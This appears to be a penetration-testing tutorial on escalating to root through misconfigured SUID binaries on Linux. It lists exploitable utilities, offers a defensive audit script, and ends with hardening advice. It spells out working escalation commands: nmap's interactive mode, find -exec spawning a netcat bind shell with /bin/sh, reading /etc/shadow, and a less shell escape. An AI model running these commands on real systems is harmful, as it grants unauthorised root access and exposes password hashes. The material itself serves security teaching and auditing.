SUID (Set User ID) is a permission bit that can be set on a file and allows users to execute the file with the permissions of its owner. There are plenty of legitimate reasons for a Linux binary to carry this permission. For example, the ping utility requires root privileges in order to open a raw network socket, but it also needs to be executable by standard users so they can verify connectivity with other hosts.

However, some existing binaries and utilities can be used to escalate privileges to root if they have the SUID permission set. Known Linux executables that can allow privilege escalation when they are SUID root are:

Nmap

Vim

find

Bash

More

Less

Nano

cp

The following commands can discover all the SUID executables present on the system. More specifically, the commands will search the / directory for files owned by the user root that have the SUID permission bit set, print them, and redirect all errors to /dev/null in order to list only the binaries that the current user has permission to access.
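As an added audit helper (not part of the original post), the shell functions below enumerate SUID files under a directory, optionally restricted to an owner, and flag the ones whose name is on the list of shell-capable utilities given above, so an administrator can review those first. The KNOWN_RISKY list and the RISK/INFO labels are assumptions introduced for this example.

```shell
#!/bin/sh
# Added audit helper (not part of the original post): enumerate SUID files
# under a directory and flag the ones whose basename is on the post's list of
# utilities that can execute commands or spawn a shell.
KNOWN_RISKY="nmap vim find bash more less nano cp"

# list_suid DIR [OWNER]: print regular files under DIR with the SUID bit set,
# optionally restricted to OWNER (the post restricts the search to root);
# errors such as "Permission denied" are sent to /dev/null.
list_suid() {
    dir=$1
    owner=$2
    if [ -n "$owner" ]; then
        find "$dir" -xdev -type f -user "$owner" -perm -4000 -print 2>/dev/null
    else
        find "$dir" -xdev -type f -perm -4000 -print 2>/dev/null
    fi
}

# flag_suid DIR [OWNER]: prefix each SUID path with RISK when its basename is
# in KNOWN_RISKY, otherwise INFO, so the RISK lines can be reviewed first.
flag_suid() {
    list_suid "$@" | while IFS= read -r path; do
        name=${path##*/}
        case " $KNOWN_RISKY " in
            *" $name "*) printf 'RISK %s\n' "$path" ;;
            *)           printf 'INFO %s\n' "$path" ;;
        esac
    done
}

# count_risky DIR [OWNER]: number of RISK entries (prints 0 when there are none)
count_risky() {
    flag_suid "$@" | grep -c '^RISK ' || true
}

# Typical use on a live host: audit root-owned SUID files under /
# flag_suid / root
```

Each RISK line deserves a decision about whether the binary really needs to run as root; INFO lines still merit review but are not on the list above.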

Nmap

Older versions of Nmap (2.02 to 5.21) had an interactive mode which allowed users to execute shell commands. Since Nmap is one of the binaries on the list and is executed with root privileges when SUID, it is possible to use the interactive console in order to run a shell with the same privileges.

nmap -V

Nmap Version Identification

The interactive mode can be started by executing Nmap with the parameter “interactive” (--interactive).

Find

The find utility is used to locate files stored on the system. However, it also has the ability to execute commands (-exec). Therefore, if it is configured to run with the SUID permission, all the commands executed through find will run as root.

touch pentestlab
find pentestlab -exec whoami \;

Find Command Execution

Since most Linux distributions have netcat installed, it is possible to upgrade the elevated command execution into a root shell.

find pentestlab -exec netcat -lvp 5555 -e /bin/sh \;

Run Netcat via Find

Connecting to the opened port will give a root shell.

netcat 192.168.1.189 5555
id
cat /etc/shadow

Root Shell via Find

Vim

Vim is primarily a text editor. However, if it runs with the SUID bit set it inherits the permissions of the root user and can therefore read any file on the system.

Bash

Less

The less utility can also execute an elevated shell. The same principle applies to the more command.

less /etc/passwd
!/bin/sh

Less – Root Shell

Conclusion

Performing privilege escalation through misconfigured SUID executables is trivial. Therefore, administrators should evaluate all SUID binaries on a system and whether each one really needs to run with the permissions of an elevated user. Particular focus should be given to applications with the ability to execute code or write arbitrary data on the system.